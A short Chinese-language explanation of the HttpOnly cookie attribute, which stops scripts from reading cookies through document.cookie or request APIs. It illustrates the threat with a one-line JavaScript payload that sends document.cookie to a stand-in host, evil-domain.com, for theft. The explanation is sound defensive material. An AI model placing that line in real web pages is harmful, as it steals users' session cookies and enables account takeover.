所谓" 不能通过js脚本获取 " 主要指的是: 使用document.cookie / XMLHttpRequest对象 / Request API 等无法获取到当前cookie. 设置方法为: HttpOnly. 没错, 这是一个没有值的属性, 只要在 Set-Cookie里面附带了这个属性, 那么这个cookie就不能被js脚本所获取.

注意:

HttpOnly可以减少恶意代码的攻击, 比如下面这个代码就可以给第三方网站发送cookie, 如果使用了HttpOnly, 则不会被窃取.

(new Image()).src = "http://www.evil-domain.com/steal-cookie.php?cookie=" + document.cookie;